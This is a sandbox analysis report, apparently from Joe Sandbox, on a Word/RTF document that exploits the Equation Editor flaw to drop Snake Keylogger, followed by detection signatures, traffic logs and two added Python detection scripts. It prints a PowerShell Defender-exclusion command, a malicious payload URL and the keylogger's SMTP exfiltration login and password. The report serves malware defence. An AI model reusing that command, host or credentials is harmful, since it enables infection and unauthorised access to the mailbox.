

Windows Analysis Report
Bank Slip 2.doc

Overview

General Information

Sample name:Bank Slip 2.doc
Analysis ID:1465556
MD5:ff06a87dd0550386be1f780d560f1877
SHA1:69e95738ec635520a508f7424a759261e5032cb0
SHA256:511c82313461b74fe24201d13dead6a280311d248062e09a465eb950502d1c18
Tags:doc

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2780 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1804 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • obie8920193.exe (PID: 3152 cmdline: "C:\Users\user\AppData\Roaming\obie8920193.exe" MD5: DBDACF479A9DD40133701E06E6DC401C)
        • powershell.exe (PID: 3236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • obie8920193.exe (PID: 3244 cmdline: "C:\Users\user\AppData\Roaming\obie8920193.exe" MD5: DBDACF479A9DD40133701E06E6DC401C)
    • EQNEDT32.EXE (PID: 3480 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
Malware family
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware configuration (Snake Keylogger): {"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587", "Version": "5.1"}
YARA matches on the submitted file
Source: Bank Slip 2.doc
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x18e86:$obj2: \objdata
  • 0x18e9b:$obj3: \objupdate
  • 0x18e63:$obj4: \objemb
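The rule above keys on three RTF control words: `\objemb` declares an embedded OLE object, `\objupdate` makes Word load that object as soon as the document opens (no click required), and `\objdata` carries the hex-encoded OLE1 stream whose class name tells you which OLE server (here the Equation Editor) will be handed the data. The Python below is an added example, not the report's or ditekSHen's code: it checks for a non-standard `{\rtfN` header, lists the object control words present, decodes `\objdata` and reads the OLE1 class name. Both RTF documents are constructed (the report does not show the sample's own bytes), and the Equation Editor class names it checks for are the identifiers the Equation Editor server registers, not values from this report.

```python
"""Triage an RTF for the embedded-object markers the rule above keys on.

Added example, not the report's or ditekSHen's code. Both sample documents are constructed.
"""
import binascii
import re

OBJECT_CONTROLS = ("\\objemb", "\\objautlink", "\\objupdate", "\\objclass", "\\objdata")
# ProgIDs registered by the Equation Editor server (known identifiers, not values from this report).
EQUATION_CLASSES = {b"Equation.3", b"Equation.2"}

HEADER_RE = re.compile(rb"^\s*\{\\rtf(\d*)")
OBJCLASS_RE = re.compile(rb"\\objclass\s+([^}\\\s]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def decode_objdata(hex_blob: bytes) -> bytes:
    """\\objdata carries the OLE1 stream as hex; whitespace and line breaks are allowed inside it."""
    clean = re.sub(rb"\s+", b"", hex_blob)
    if len(clean) % 2:            # blobs with a dangling nibble are common in exploit documents
        clean = clean[:-1]
    return binascii.unhexlify(clean)


def ole1_class_name(stream: bytes):
    """OLE1 header: OLEVersion(4) FormatID(4) ClassNameLength(4) ClassName. Returns the name or None."""
    if len(stream) < 12:
        return None
    name_len = int.from_bytes(stream[8:12], "little")
    if not 0 < name_len <= 256 or len(stream) < 12 + name_len:
        return None
    return stream[12:12 + name_len].rstrip(b"\0")


def scan_rtf(doc: bytes) -> dict:
    """Header version, object control words, OLE class names and a list of findings."""
    m = HEADER_RE.match(doc)
    version = m.group(1).decode() if m else None
    controls = [c for c in OBJECT_CONTROLS if c.encode() in doc]
    classes = set(OBJCLASS_RE.findall(doc))
    payloads = [decode_objdata(h) for h in OBJDATA_RE.findall(doc)]
    classes.update(n for n in map(ole1_class_name, payloads) if n)
    findings = []
    if m and version != "1":
        findings.append(f"non-standard RTF header version {version!r}")
    if "\\objupdate" in controls:
        findings.append("\\objupdate forces the embedded object to load on open")
    if classes & EQUATION_CLASSES:
        findings.append("Equation Editor object (CVE-2017-11882 / CVE-2018-0802 target)")
    return {
        "rtf_version": version,
        "object_controls": controls,
        "object_classes": sorted(c.decode(errors="replace") for c in classes),
        "objdata_bytes": [len(p) for p in payloads],
        "findings": findings,
        "suspicious": bool(findings),
    }


def _ole1(class_name: bytes, native: bytes) -> bytes:
    """Minimal OLE1 embedded-object stream: version, FormatID 2 (embedded), class name, data."""
    name = class_name + b"\0"
    return (b"\x01\x05\x00\x00" + b"\x02\x00\x00\x00" + len(name).to_bytes(4, "little") + name
            + b"\0\0\0\0" * 2 + len(native).to_bytes(4, "little") + native)   # empty topic/item names


# Constructed documents. The malicious one carries the rule's triggers; its native data is
# zero filler, not an Equation Editor record.
SAMPLE_MALICIOUS = (b"{\\rtf2\\ansi{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}{\\*\\objdata "
                    + binascii.hexlify(_ole1(b"Equation.3", b"\0" * 16)) + b"}}}")
SAMPLE_BENIGN = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}Invoice attached.\\par}"

if __name__ == "__main__":
    for name, doc in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_rtf(doc))
```

The class-name check is the part worth keeping: `\objclass` can be omitted or lie, but the OLE1 stream inside `\objdata` still has to name a class for Word to instantiate the server, so reading it out of the decoded bytes is the more reliable of the two. Real exploit documents also pad `\objdata` with non-hex junk and split it across control groups, which is why the decoder strips whitespace and tolerates an odd nibble rather than failing hard.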
YARA matches on memory dumps
Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
    • 0x14771:$a1: get_encryptedPassword
    • 0x14a5d:$a2: get_encryptedUsername
    • 0x1457d:$a3: get_timePasswordChanged
    • 0x14678:$a4: get_passwordField
    • 0x14787:$a5: set_encryptedPassword
    • 0x15d6d:$a7: get_logins
    • 0x15cd0:$a10: KeyLoggerEventArgs
    • 0x15969:$a11: KeyLoggerEventArgsEventHandler
  Rule: MALWARE_Win_SnakeKeylogger | Description: Detects Snake Keylogger | Author: ditekSHen
    • 0x17fdc:$x1: $%SMTPDV$
    • 0x18042:$x2: $#TheHashHere%&
    • 0x19621:$x3: %FTPDV$
    • 0x19715:$x4: $%TelegramDv$
    • 0x15969:$x5: KeyLoggerEventArgs
    • 0x15cd0:$x5: KeyLoggerEventArgs
    • 0x19645:$m2: Clipboard Logs ID
    • 0x19865:$m2: Screenshot Logs ID
    • 0x19975:$m2: keystroke Logs ID
    • 0x19c4f:$m3: SnakePW
    • 0x1983d:$m4: \SnakeKeylogger\
Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
(13 entries total; remainder not shown)
YARA matches on unpacked PE files
Source: 5.2.obie8920193.exe.3599d70.8.unpack
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
    • 0x12b71:$a1: get_encryptedPassword
    • 0x12e5d:$a2: get_encryptedUsername
    • 0x1297d:$a3: get_timePasswordChanged
    • 0x12a78:$a4: get_passwordField
    • 0x12b87:$a5: set_encryptedPassword
    • 0x1416d:$a7: get_logins
    • 0x140d0:$a10: KeyLoggerEventArgs
    • 0x13d69:$a11: KeyLoggerEventArgsEventHandler
  Rule: MAL_Envrial_Jan18_1 | Description: Detects Encrial credential stealer malware | Author: Florian Roth
    • 0x1a411:$a2: \Comodo\Dragon\User Data\Default\Login Data
    • 0x19643:$a3: \Google\Chrome\User Data\Default\Login Data
    • 0x19a76:$a4: \Orbitum\User Data\Default\Login Data
    • 0x1aab5:$a5: \Kometa\User Data\Default\Login Data
  Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Description: Detects executables with potential process hooking | Author: ditekSHen
    • 0x13702:$s1: UnHook
    • 0x13709:$s2: SetHook
    • 0x13711:$s3: CallNextHook
    • 0x1371e:$s4: _hook
(28 entries total; remainder not shown)

            Exploits

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1804, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exe

            System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 104.21.53.203, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1804, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ParentImage: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentProcessId: 3152, ParentProcessName: obie8920193.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3236, ProcessName: powershell.exe
Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obie8920193.exe, NewProcessName: C:\Users\user\AppData\Roaming\obie8920193.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1804, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3152, ProcessName: obie8920193.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obie8920193.exe, NewProcessName: C:\Users\user\AppData\Roaming\obie8920193.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1804, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3152, ProcessName: obie8920193.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ParentImage: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentProcessId: 3152, ParentProcessName: obie8920193.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3236, ProcessName: powershell.exe
Source: DNS query | Author: Brandon George (blog post), Thomas Patzke | Data: Image: C:\Users\user\AppData\Roaming\obie8920193.exe, QueryName: checkip.dyndns.org
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1804, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obie8920193.exe", ParentImage: C:\Users\user\AppData\Roaming\obie8920193.exe, ParentProcessId: 3152, ParentProcessName: obie8920193.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe", ProcessId: 3236, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2780, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3236, TargetFilename: C:\Users\user\AppData\Local\Temp\oygt2vjk.eyq.ps1
            No Snort rule has matched



            AV Detection

Source: https://ampol.top/FcdBUj68lnCbMtB.exe | Avira URL Cloud: Label: malware
Source: https://ampol.top/FcdBUj68lnCbMtB.exej | Avira URL Cloud: Label: malware
Source: https://ampol.top/ | Avira URL Cloud: Label: malware
Source: https://ampol.top/FcdBUj68lnCbMtB.exettC: | Avira URL Cloud: Label: malware
Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587", "Version": "5.1"}
Source: Bank Slip 2.doc | ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exe | Joe Sandbox ML: detected

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

            Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 104.21.53.203 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\obie8920193.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\obie8920193.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 104.21.53.203:443 -> 192.168.2.22:49163 version: TLS 1.2

            Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Code functions with inlined nop runs (function ID in parentheses):
  4x nop then jmp 001C289Bh (5_2_001C230D)
  4x nop then mov dword ptr [ebp-14h], 00000000h (7_2_003C5038)
  4x nop then jmp 003C7B81h (7_2_003C78C1)
  4x nop then jmp 003C5D07h (7_2_003C5B18)
  4x nop then jmp 003C6691h (7_2_003C5B18)
  4x nop then jmp 003C8143h (7_2_003C7D30)
  4x nop then jmp 003C6A01h (7_2_003C6740)
  4x nop then jmp 003C72C1h (7_2_003C7000)
  4x nop then jmp 003C8143h (7_2_003C8072)
  4x nop then jmp 003C6E61h (7_2_003C6BA0)
  4x nop then jmp 003C7721h (7_2_003C7460)
  4x nop then jmp 005746F1h (7_2_00574448)
  4x nop then jmp 0057ACF1h (7_2_0057AA48)
  4x nop then jmp 00579711h (7_2_00579468)
  4x nop then jmp 00575CA9h (7_2_00575A00)
  4x nop then jmp 00572CE1h (7_2_00572A38)
  4x nop then jmp 005712D1h (7_2_00571028)
  4x nop then jmp 0057C2D1h (7_2_0057C028)
  4x nop then jmp 00571B81h (7_2_005718D8)
  4x nop then jmp 0057CC15h (7_2_0057C8D8)
  4x nop then jmp 00574FA1h (7_2_00574CF8)
  4x nop then jmp 00573591h (7_2_005732E8)
  4x nop then jmp 00579B91h (7_2_005798E8)
  4x nop then jmp 00573139h (7_2_00572E90)
  4x nop then lea esp, dword ptr [ebp-04h] (7_2_00577698)
  4x nop then jmp 00571729h (7_2_00571480)
  4x nop then jmp 0057C729h (7_2_0057C480)
  4x nop then jmp 00574B49h (7_2_005748A0)
  4x nop then jmp 0057B149h (7_2_0057AEA0)
  4x nop then jmp 005753F9h (7_2_00575150)
  4x nop then jmp 005739E9h (7_2_00573740)
  4x nop then jmp 00579FE9h (7_2_00579D40)
  4x nop then jmp 00570A21h (7_2_00570778)
  4x nop then jmp 0057BA21h (7_2_0057B778)
  4x nop then jmp 00571FD9h (7_2_00571D30)
  4x nop then jmp 005705C9h (7_2_00570320)
  4x nop then jmp 0057B5CAh (7_2_0057B320)
  4x nop then jmp 00570E79h (7_2_00570BD0)
  4x nop then jmp 0057BE79h (7_2_0057BBD0)
  4x nop then jmp 00574299h (7_2_00573FF0)
  4x nop then jmp 0057A899h (7_2_0057A5F0)
  4x nop then jmp 00572889h (7_2_005725E0)
  4x nop then jmp 00573E41h (7_2_00573B98)
  4x nop then jmp 0057A441h (7_2_0057A198)
  4x nop then jmp 00572431h (7_2_00572188)
  4x nop then lea esp, dword ptr [ebp-04h] (7_2_005779AE)
  4x nop then jmp 00575851h (7_2_005755A8)
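The entries above come from a simple byte-level heuristic: a run of four or more `nop` (0x90) bytes immediately followed by a `jmp`, `mov` or `lea` inside a function body, which the report files under "inlined nop instructions (likely shell or obfuscated code)". The Python below is an added example, not Joe Sandbox's scanner: it finds such runs in a code buffer, decodes the target of `E9`/`EB` jumps so the output reads like the report's lines, and ignores shorter runs. The byte string is constructed, not taken from the sample; it is laid out at the address of function `7_2_003C78C1` so that the first hit reproduces that entry (jump to 003C7B81h), and the rest is filler. Keep in mind that the .NET JIT and native compilers also emit nop padding for alignment, so this pattern on its own is noise rather than evidence.

```python
"""Find runs of inlined nops and classify the instruction after them.

Added example, not Joe Sandbox's own signature code. The byte buffer is constructed.
"""
NOP = 0x90


def find_nop_runs(code: bytes, base: int = 0, min_run: int = 4) -> list[dict]:
    """Runs of >= min_run 0x90 bytes and the opcode that follows, as virtual addresses (base + offset)."""
    hits, i, n = [], 0, len(code)
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        j = i
        while j < n and code[j] == NOP:
            j += 1
        run = j - i
        if run >= min_run and j < n:
            op, target = code[j], None
            if op == 0xEB and j + 2 <= n:            # jmp rel8: target = next instruction + rel
                rel = int.from_bytes(code[j + 1:j + 2], "little", signed=True)
                kind, target = "jmp rel8", base + j + 2 + rel
            elif op == 0xE9 and j + 5 <= n:          # jmp rel32
                rel = int.from_bytes(code[j + 1:j + 5], "little", signed=True)
                kind, target = "jmp rel32", base + j + 5 + rel
            elif op in (0x89, 0x8B, 0xC7):           # mov r/m,r / mov r,r/m / mov r/m,imm32
                kind = "mov"
            elif op == 0x8D:                         # lea
                kind = "lea"
            else:
                kind = f"opcode {op:02X}h"
            hits.append({"addr": base + i, "nops": run, "next": kind, "target": target})
        i = j
    return hits


def describe(hit: dict) -> str:
    """Render a hit the way the report phrases it, e.g. '4x nop then jmp 003C7B81h'."""
    text = f"{hit['nops']}x nop then {hit['next'].split()[0]}"
    if hit["target"] is not None:
        text += f" {hit['target']:08X}h"
    return text


# Constructed x86 bytes laid out at the address of the report's function 7_2_003C78C1,
# so the first hit reproduces its entry. Everything after the first jmp is filler.
BASE = 0x003C78C1
SAMPLE_CODE = bytes.fromhex(
    "55 8b ec "               # push ebp; mov ebp, esp
    "90 90 90 90 "            # 4x nop at 003C78C4h
    "e9 b4 02 00 00 "         # jmp 003C7B81h (rel32 = 2B4h from the next address, 003C78CDh)
    "90 90 c3 "               # 2x nop, ret (below threshold, not reported)
    "90 90 90 90 90 "         # 5x nop
    "8b 45 fc "               # mov eax, [ebp-4]
    "90 90 90 90 "            # 4x nop
    "eb 05 "                  # jmp short +5
    "c3 "                     # ret
)

if __name__ == "__main__":
    for h in find_nop_runs(SAMPLE_CODE, BASE):
        print(f"{h['addr']:08X}: {describe(h)}")
```

The function IDs in the report (`7_2_003C78C1`) are process 7, run 2, function start address, so the hits above would be attributed to the function whose start precedes the run; this scanner deliberately stops short of that and only reports addresses, because without a disassembler a `0x90` inside an immediate or displacement is indistinguishable from a real `nop`.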
Source: global traffic | DNS query: name: ampol.top
Source: global traffic | DNS query: name: checkip.dyndns.org (16 queries)
Source: global traffic | DNS query: name: reallyfreegeoip.org (8 queries)
Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443 (80 entries)
Source: global traffic | TCP traffic: 192.168.2.22:49165, 49166, 49168, 49170, 49172, 49174, 49176, 49178 -> 188.114.96.3:443 (one entry per source port)
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80 (3 entries)
Source: global traffic | TCP traffic: 192.168.2.22:49171, 49173 -> 158.101.44.242:80 (one entry per source port)
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
Source: global traffic | TCP traffic: 192.168.2.22:49169, 49175, 49177 -> 193.122.130.0:80 (one entry per source port)
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
